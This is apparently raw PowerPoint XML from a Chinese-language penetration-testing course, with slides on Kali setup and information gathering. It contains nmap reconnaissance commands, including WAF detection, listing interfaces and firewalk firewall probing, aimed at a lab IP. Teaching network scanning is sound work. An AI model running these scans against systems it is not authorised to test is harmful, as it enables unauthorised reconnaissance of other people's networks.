                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>爆破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--script=http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-detect 192.168.56.102 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>识别防火墙</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406364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nmap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29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7244" y="1821771"/>
            <a:ext cx="6096000" cy="2228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nmap --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iflist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en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip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列举路由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nmap -e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>指定网络接口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nmap --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>firewalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> --traceroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip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防火墙探测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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>oN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标准保存 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap -F -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> test.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip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465" y="844898"/>
            <a:ext cx="5003765" cy="5165176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5122936" y="833885"/>
            <a:ext cx="5545065" cy="5196207"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5436096"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5142453"/>
              <a:gd name="connsiteX1" fmla="*/ 5436096 w 5436096"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5142453"/>
              <a:gd name="connsiteX2" fmla="*/ 5436096 w 5436096"/>
              <a:gd name="connsiteY2" fmla="*/ 5142453 h 5142453"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 5436096"/>
              <a:gd name="connsiteY3" fmla="*/ 5142453 h 5142453"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 5436096"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 5142453"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 5436096"/>
              <a:gd name="connsiteY0-2" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX1-3" fmla="*/ 5436096 w 5436096"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX2-5" fmla="*/ 5436096 w 5436096"/>
              <a:gd name="connsiteY2-6" fmla="*/ 5142453 h 5152502"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1808703 w 5436096"/>
              <a:gd name="connsiteY3-8" fmla="*/ 5152502 h 5152502"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 5436096"/>
              <a:gd name="connsiteY4-10" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 4823147"/>
              <a:gd name="connsiteY0-12" fmla="*/ 10049 h 5152502"/>
              <a:gd name="connsiteX1-13" fmla="*/ 4823147 w 4823147"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX2-15" fmla="*/ 4823147 w 4823147"/>
              <a:gd name="connsiteY2-16" fmla="*/ 5142453 h 5152502"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1195754 w 4823147"/>
              <a:gd name="connsiteY3-18" fmla="*/ 5152502 h 5152502"/>
              <a:gd name="connsiteX4-19" fmla="*/ 0 w 4823147"/>
              <a:gd name="connsiteY4-20" fmla="*/ 10049 h 5152502"/>
              <a:gd name="connsiteX0-21" fmla="*/ 0 w 4578898"/>
              <a:gd name="connsiteY0-22" fmla="*/ 125 h 5152502"/>
              <a:gd name="connsiteX1-23" fmla="*/ 4578898 w 4578898"/>
              <a:gd name="connsiteY1-24" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX2-25" fmla="*/ 4578898 w 4578898"/>
              <a:gd name="connsiteY2-26" fmla="*/ 5142453 h 5152502"/>
              <a:gd name="connsiteX3-27" fmla="*/ 951505 w 4578898"/>
              <a:gd name="connsiteY3-28" fmla="*/ 5152502 h 5152502"/>
              <a:gd name="connsiteX4-29" fmla="*/ 0 w 4578898"/>
              <a:gd name="connsiteY4-30" fmla="*/ 125 h 5152502"/>
              <a:gd name="connsiteX0-31" fmla="*/ 0 w 4663122"/>
              <a:gd name="connsiteY0-32" fmla="*/ 10050 h 5152502"/>
              <a:gd name="connsiteX1-33" fmla="*/ 4663122 w 4663122"/>
              <a:gd name="connsiteY1-34" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX2-35" fmla="*/ 4663122 w 4663122"/>
              <a:gd name="connsiteY2-36" fmla="*/ 5142453 h 5152502"/>
              <a:gd name="connsiteX3-37" fmla="*/ 1035729 w 4663122"/>
              <a:gd name="connsiteY3-38" fmla="*/ 5152502 h 5152502"/>
              <a:gd name="connsiteX4-39" fmla="*/ 0 w 4663122"/>
              <a:gd name="connsiteY4-40" fmla="*/ 10050 h 5152502"/>
              <a:gd name="connsiteX0-41" fmla="*/ 0 w 4663122"/>
              <a:gd name="connsiteY0-42" fmla="*/ 10050 h 5152502"/>
              <a:gd name="connsiteX1-43" fmla="*/ 4663122 w 4663122"/>
              <a:gd name="connsiteY1-44" fmla="*/ 0 h 5152502"/>
              <a:gd name="connsiteX2-45" fmla="*/ 4663122 w 4663122"/>
              <a:gd name="connsiteY2-46" fmla="*/ 5142453 h 5152502"/>
              <a:gd name="connsiteX3-47" fmla="*/ 1002507 w 4663122"/>
              <a:gd name="connsiteY3-48" fmla="*/ 5152502 h 5152502"/>
              <a:gd name="connsiteX4-49" fmla="*/ 0 w 4663122"/>
              <a:gd name="connsiteY4-50" fmla="*/ 10050 h 51525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663122" h="5152502">
                <a:moveTo>
                  <a:pt x="0" y="10050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4663122" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4663122" y="5142453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002507" y="5152502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10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 defTabSz="685800">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="135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885085" y="1059627"/>
            <a:ext cx="358611" cy="35861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059540" y="1206075"/>
            <a:ext cx="289112" cy="289112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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="66CCFF"/>
                  </a:gs>
                  <a:gs pos="52000">
                    <a:prstClr val="white"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="0070C0"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="1" descr="D:\360data\重要数据\桌面\666666666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561853" y="2422350"/>
            <a:ext cx="1940589" cy="1940589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2" descr="D:\360data\重要数据\桌面\555555555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561853" y="2422350"/>
            <a:ext cx="1940589" cy="1940589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3" descr="D:\360data\重要数据\桌面\4444444444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561853" y="2422350"/>
            <a:ext cx="1940589" cy="1940589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4" descr="D:\360data\重要数据\桌面\333333333333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561853" y="2422350"/>
            <a:ext cx="1940589" cy="1940589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5" descr="D:\360data\重要数据\桌面\222222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2561853" y="2422350"/>
            <a:ext cx="1940589" cy="1940589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6" descr="D:\360data\重要数据\桌面\11111111.pn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2561853" y="2422350"/>
            <a:ext cx="1940589" cy="1940589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圆角矩形 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19006218">
            <a:off x="5901019" y="1846059"/>
            <a:ext cx="551428" cy="551428"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="91B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5" name="圆角矩形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19006218">
            <a:off x="6091519" y="2726826"/>
            <a:ext cx="551428" cy="551428"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2790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6" name="圆角矩形 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19006218">
            <a:off x="6282020" y="3607595"/>
            <a:ext cx="551428" cy="551428"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2C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7" name="圆角矩形 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19006218">
            <a:off x="6472519" y="4488362"/>
            <a:ext cx="551428" cy="551428"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="353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92257" y="1948647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Kali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基础配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6048555" y="1989137"/>
            <a:ext cx="281722" cy="320264"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 124 w 127"/>
              <a:gd name="T1" fmla="*/ 17 h 145"/>
              <a:gd name="T2" fmla="*/ 64 w 127"/>
              <a:gd name="T3" fmla="*/ 1 h 145"/>
              <a:gd name="T4" fmla="*/ 3 w 127"/>
              <a:gd name="T5" fmla="*/ 17 h 145"/>
              <a:gd name="T6" fmla="*/ 3 w 127"/>
              <a:gd name="T7" fmla="*/ 42 h 145"/>
              <a:gd name="T8" fmla="*/ 24 w 127"/>
              <a:gd name="T9" fmla="*/ 103 h 145"/>
              <a:gd name="T10" fmla="*/ 40 w 127"/>
              <a:gd name="T11" fmla="*/ 123 h 145"/>
              <a:gd name="T12" fmla="*/ 56 w 127"/>
              <a:gd name="T13" fmla="*/ 139 h 145"/>
              <a:gd name="T14" fmla="*/ 64 w 127"/>
              <a:gd name="T15" fmla="*/ 145 h 145"/>
              <a:gd name="T16" fmla="*/ 71 w 127"/>
              <a:gd name="T17" fmla="*/ 139 h 145"/>
              <a:gd name="T18" fmla="*/ 87 w 127"/>
              <a:gd name="T19" fmla="*/ 123 h 145"/>
              <a:gd name="T20" fmla="*/ 103 w 127"/>
              <a:gd name="T21" fmla="*/ 103 h 145"/>
              <a:gd name="T22" fmla="*/ 124 w 127"/>
              <a:gd name="T23" fmla="*/ 42 h 145"/>
              <a:gd name="T24" fmla="*/ 124 w 127"/>
              <a:gd name="T25" fmla="*/ 17 h 145"/>
              <a:gd name="T26" fmla="*/ 75 w 127"/>
              <a:gd name="T27" fmla="*/ 112 h 145"/>
              <a:gd name="T28" fmla="*/ 64 w 127"/>
              <a:gd name="T29" fmla="*/ 124 h 145"/>
              <a:gd name="T30" fmla="*/ 64 w 127"/>
              <a:gd name="T31" fmla="*/ 73 h 145"/>
              <a:gd name="T32" fmla="*/ 27 w 127"/>
              <a:gd name="T33" fmla="*/ 73 h 145"/>
              <a:gd name="T34" fmla="*/ 19 w 127"/>
              <a:gd name="T35" fmla="*/ 40 h 145"/>
              <a:gd name="T36" fmla="*/ 19 w 127"/>
              <a:gd name="T37" fmla="*/ 39 h 145"/>
              <a:gd name="T38" fmla="*/ 18 w 127"/>
              <a:gd name="T39" fmla="*/ 27 h 145"/>
              <a:gd name="T40" fmla="*/ 59 w 127"/>
              <a:gd name="T41" fmla="*/ 18 h 145"/>
              <a:gd name="T42" fmla="*/ 64 w 127"/>
              <a:gd name="T43" fmla="*/ 18 h 145"/>
              <a:gd name="T44" fmla="*/ 64 w 127"/>
              <a:gd name="T45" fmla="*/ 73 h 145"/>
              <a:gd name="T46" fmla="*/ 100 w 127"/>
              <a:gd name="T47" fmla="*/ 73 h 145"/>
              <a:gd name="T48" fmla="*/ 90 w 127"/>
              <a:gd name="T49" fmla="*/ 94 h 145"/>
              <a:gd name="T50" fmla="*/ 75 w 127"/>
              <a:gd name="T51" fmla="*/ 112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27" h="145">
                <a:moveTo>
                  <a:pt x="124" y="17"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="17"/>
                  <a:pt x="100" y="0"/>
                  <a:pt x="64" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="0"/>
                  <a:pt x="3" y="17"/>
                  <a:pt x="3" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="19"/>
                  <a:pt x="2" y="38"/>
                  <a:pt x="3" y="42"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="63"/>
                  <a:pt x="12" y="86"/>
                  <a:pt x="24" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="111"/>
                  <a:pt x="34" y="117"/>
                  <a:pt x="40" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="129"/>
                  <a:pt x="51" y="134"/>
                  <a:pt x="56" y="139"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="140"/>
                  <a:pt x="61" y="144"/>
                  <a:pt x="64" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="144"/>
                  <a:pt x="70" y="140"/>
                  <a:pt x="71" y="139"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="134"/>
                  <a:pt x="82" y="129"/>
                  <a:pt x="87" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="117"/>
                  <a:pt x="99" y="111"/>
                  <a:pt x="103" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="86"/>
                  <a:pt x="122" y="63"/>
                  <a:pt x="124" y="42"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="38"/>
                  <a:pt x="127" y="19"/>
                  <a:pt x="124" y="17"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="75" y="112"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="116"/>
                  <a:pt x="67" y="120"/>
                  <a:pt x="64" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="73"/>
                  <a:pt x="64" y="73"/>
                  <a:pt x="64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3" y="63"/>
                  <a:pt x="21" y="52"/>
                  <a:pt x="19" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="39"/>
                  <a:pt x="19" y="39"/>
                  <a:pt x="19" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="33"/>
                  <a:pt x="18" y="30"/>
                  <a:pt x="18" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="24"/>
                  <a:pt x="40" y="18"/>
                  <a:pt x="59" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="18"/>
                  <a:pt x="62" y="18"/>
                  <a:pt x="64" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="73"/>
                  <a:pt x="64" y="73"/>
                  <a:pt x="64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97" y="81"/>
                  <a:pt x="94" y="88"/>
                  <a:pt x="90" y="94"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="100"/>
                  <a:pt x="81" y="106"/>
                  <a:pt x="75" y="1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pPr defTabSz="685800"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="135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782757" y="28294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信息收集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6947465" y="36969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弱点测试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7163758" y="4602560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US" altLang="zh-CN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Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1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网络讲解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Freeform 33"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384515" y="3765439"/>
            <a:ext cx="346439" cy="235738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 593606 w 157"/>
              <a:gd name="T1" fmla="*/ 206457 h 107"/>
              <a:gd name="T2" fmla="*/ 602400 w 157"/>
              <a:gd name="T3" fmla="*/ 162530 h 107"/>
              <a:gd name="T4" fmla="*/ 439708 w 157"/>
              <a:gd name="T5" fmla="*/ 0 h 107"/>
              <a:gd name="T6" fmla="*/ 320987 w 157"/>
              <a:gd name="T7" fmla="*/ 79069 h 107"/>
              <a:gd name="T8" fmla="*/ 202266 w 157"/>
              <a:gd name="T9" fmla="*/ 35142 h 107"/>
              <a:gd name="T10" fmla="*/ 87942 w 157"/>
              <a:gd name="T11" fmla="*/ 175708 h 107"/>
              <a:gd name="T12" fmla="*/ 92339 w 157"/>
              <a:gd name="T13" fmla="*/ 206457 h 107"/>
              <a:gd name="T14" fmla="*/ 0 w 157"/>
              <a:gd name="T15" fmla="*/ 333846 h 107"/>
              <a:gd name="T16" fmla="*/ 136310 w 157"/>
              <a:gd name="T17" fmla="*/ 470020 h 107"/>
              <a:gd name="T18" fmla="*/ 554032 w 157"/>
              <a:gd name="T19" fmla="*/ 470020 h 107"/>
              <a:gd name="T20" fmla="*/ 690342 w 157"/>
              <a:gd name="T21" fmla="*/ 333846 h 107"/>
              <a:gd name="T22" fmla="*/ 593606 w 157"/>
              <a:gd name="T23" fmla="*/ 206457 h 107"/>
              <a:gd name="T24" fmla="*/ 527650 w 157"/>
              <a:gd name="T25" fmla="*/ 443664 h 107"/>
              <a:gd name="T26" fmla="*/ 347370 w 157"/>
              <a:gd name="T27" fmla="*/ 443664 h 107"/>
              <a:gd name="T28" fmla="*/ 457297 w 157"/>
              <a:gd name="T29" fmla="*/ 333846 h 107"/>
              <a:gd name="T30" fmla="*/ 452900 w 157"/>
              <a:gd name="T31" fmla="*/ 320668 h 107"/>
              <a:gd name="T32" fmla="*/ 404532 w 157"/>
              <a:gd name="T33" fmla="*/ 320668 h 107"/>
              <a:gd name="T34" fmla="*/ 404532 w 157"/>
              <a:gd name="T35" fmla="*/ 298704 h 107"/>
              <a:gd name="T36" fmla="*/ 404532 w 157"/>
              <a:gd name="T37" fmla="*/ 162530 h 107"/>
              <a:gd name="T38" fmla="*/ 395737 w 157"/>
              <a:gd name="T39" fmla="*/ 158138 h 107"/>
              <a:gd name="T40" fmla="*/ 281413 w 157"/>
              <a:gd name="T41" fmla="*/ 158138 h 107"/>
              <a:gd name="T42" fmla="*/ 272619 w 157"/>
              <a:gd name="T43" fmla="*/ 166923 h 107"/>
              <a:gd name="T44" fmla="*/ 272619 w 157"/>
              <a:gd name="T45" fmla="*/ 298704 h 107"/>
              <a:gd name="T46" fmla="*/ 272619 w 157"/>
              <a:gd name="T47" fmla="*/ 320668 h 107"/>
              <a:gd name="T48" fmla="*/ 224251 w 157"/>
              <a:gd name="T49" fmla="*/ 320668 h 107"/>
              <a:gd name="T50" fmla="*/ 224251 w 157"/>
              <a:gd name="T51" fmla="*/ 333846 h 107"/>
              <a:gd name="T52" fmla="*/ 334178 w 157"/>
              <a:gd name="T53" fmla="*/ 443664 h 107"/>
              <a:gd name="T54" fmla="*/ 167089 w 157"/>
              <a:gd name="T55" fmla="*/ 443664 h 107"/>
              <a:gd name="T56" fmla="*/ 48368 w 157"/>
              <a:gd name="T57" fmla="*/ 329453 h 107"/>
              <a:gd name="T58" fmla="*/ 127515 w 157"/>
              <a:gd name="T59" fmla="*/ 219636 h 107"/>
              <a:gd name="T60" fmla="*/ 123118 w 157"/>
              <a:gd name="T61" fmla="*/ 193279 h 107"/>
              <a:gd name="T62" fmla="*/ 224251 w 157"/>
              <a:gd name="T63" fmla="*/ 74676 h 107"/>
              <a:gd name="T64" fmla="*/ 329781 w 157"/>
              <a:gd name="T65" fmla="*/ 131781 h 107"/>
              <a:gd name="T66" fmla="*/ 430914 w 157"/>
              <a:gd name="T67" fmla="*/ 48320 h 107"/>
              <a:gd name="T68" fmla="*/ 562827 w 157"/>
              <a:gd name="T69" fmla="*/ 184494 h 107"/>
              <a:gd name="T70" fmla="*/ 558430 w 157"/>
              <a:gd name="T71" fmla="*/ 219636 h 107"/>
              <a:gd name="T72" fmla="*/ 646371 w 157"/>
              <a:gd name="T73" fmla="*/ 329453 h 107"/>
              <a:gd name="T74" fmla="*/ 527650 w 157"/>
              <a:gd name="T75" fmla="*/ 443664 h 10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4" name="Freeform 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629716" y="4627553"/>
            <a:ext cx="263295" cy="273047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 247789 w 137"/>
              <a:gd name="T1" fmla="*/ 142679 h 142"/>
              <a:gd name="T2" fmla="*/ 342900 w 137"/>
              <a:gd name="T3" fmla="*/ 142679 h 142"/>
              <a:gd name="T4" fmla="*/ 190222 w 137"/>
              <a:gd name="T5" fmla="*/ 10013 h 142"/>
              <a:gd name="T6" fmla="*/ 172701 w 137"/>
              <a:gd name="T7" fmla="*/ 0 h 142"/>
              <a:gd name="T8" fmla="*/ 155181 w 137"/>
              <a:gd name="T9" fmla="*/ 10013 h 142"/>
              <a:gd name="T10" fmla="*/ 0 w 137"/>
              <a:gd name="T11" fmla="*/ 142679 h 142"/>
              <a:gd name="T12" fmla="*/ 97614 w 137"/>
              <a:gd name="T13" fmla="*/ 142679 h 142"/>
              <a:gd name="T14" fmla="*/ 155181 w 137"/>
              <a:gd name="T15" fmla="*/ 12516 h 142"/>
              <a:gd name="T16" fmla="*/ 155181 w 137"/>
              <a:gd name="T17" fmla="*/ 15019 h 142"/>
              <a:gd name="T18" fmla="*/ 110128 w 137"/>
              <a:gd name="T19" fmla="*/ 142679 h 142"/>
              <a:gd name="T20" fmla="*/ 160187 w 137"/>
              <a:gd name="T21" fmla="*/ 142679 h 142"/>
              <a:gd name="T22" fmla="*/ 160187 w 137"/>
              <a:gd name="T23" fmla="*/ 307885 h 142"/>
              <a:gd name="T24" fmla="*/ 160187 w 137"/>
              <a:gd name="T25" fmla="*/ 312892 h 142"/>
              <a:gd name="T26" fmla="*/ 160187 w 137"/>
              <a:gd name="T27" fmla="*/ 325407 h 142"/>
              <a:gd name="T28" fmla="*/ 190222 w 137"/>
              <a:gd name="T29" fmla="*/ 355445 h 142"/>
              <a:gd name="T30" fmla="*/ 220257 w 137"/>
              <a:gd name="T31" fmla="*/ 325407 h 142"/>
              <a:gd name="T32" fmla="*/ 220257 w 137"/>
              <a:gd name="T33" fmla="*/ 312892 h 142"/>
              <a:gd name="T34" fmla="*/ 197731 w 137"/>
              <a:gd name="T35" fmla="*/ 312892 h 142"/>
              <a:gd name="T36" fmla="*/ 197731 w 137"/>
              <a:gd name="T37" fmla="*/ 317898 h 142"/>
              <a:gd name="T38" fmla="*/ 197731 w 137"/>
              <a:gd name="T39" fmla="*/ 325407 h 142"/>
              <a:gd name="T40" fmla="*/ 190222 w 137"/>
              <a:gd name="T41" fmla="*/ 335420 h 142"/>
              <a:gd name="T42" fmla="*/ 180210 w 137"/>
              <a:gd name="T43" fmla="*/ 325407 h 142"/>
              <a:gd name="T44" fmla="*/ 180210 w 137"/>
              <a:gd name="T45" fmla="*/ 317898 h 142"/>
              <a:gd name="T46" fmla="*/ 180210 w 137"/>
              <a:gd name="T47" fmla="*/ 312892 h 142"/>
              <a:gd name="T48" fmla="*/ 180210 w 137"/>
              <a:gd name="T49" fmla="*/ 280351 h 142"/>
              <a:gd name="T50" fmla="*/ 180210 w 137"/>
              <a:gd name="T51" fmla="*/ 142679 h 142"/>
              <a:gd name="T52" fmla="*/ 235274 w 137"/>
              <a:gd name="T53" fmla="*/ 142679 h 142"/>
              <a:gd name="T54" fmla="*/ 190222 w 137"/>
              <a:gd name="T55" fmla="*/ 15019 h 142"/>
              <a:gd name="T56" fmla="*/ 190222 w 137"/>
              <a:gd name="T57" fmla="*/ 12516 h 142"/>
              <a:gd name="T58" fmla="*/ 247789 w 137"/>
              <a:gd name="T59" fmla="*/ 142679 h 14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9"/>
                  <a:pt x="105" y="7"/>
                  <a:pt x="76" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74" y="2"/>
                  <a:pt x="72" y="0"/>
                  <a:pt x="69" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="0"/>
                  <a:pt x="64" y="2"/>
                  <a:pt x="62" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="7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8"/>
                  <a:pt x="62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41" y="32"/>
                  <a:pt x="44" y="57"/>
                  <a:pt x="4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3"/>
                  <a:pt x="64" y="123"/>
                  <a:pt x="64" y="123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7"/>
                  <a:pt x="69" y="142"/>
                  <a:pt x="76" y="142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82" y="142"/>
                  <a:pt x="88" y="137"/>
                  <a:pt x="88" y="130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88" y="125"/>
                  <a:pt x="88" y="125"/>
                  <a:pt x="88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30"/>
                  <a:pt x="79" y="130"/>
                  <a:pt x="79" y="130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="132"/>
                  <a:pt x="78" y="134"/>
                  <a:pt x="76" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74" y="134"/>
                  <a:pt x="72" y="132"/>
                  <a:pt x="72" y="130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2"/>
                  <a:pt x="76" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="5"/>
                  <a:pt x="76" y="5"/>
                  <a:pt x="76" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="8"/>
                  <a:pt x="99" y="24"/>
                  <a:pt x="9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685800"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="135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55" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
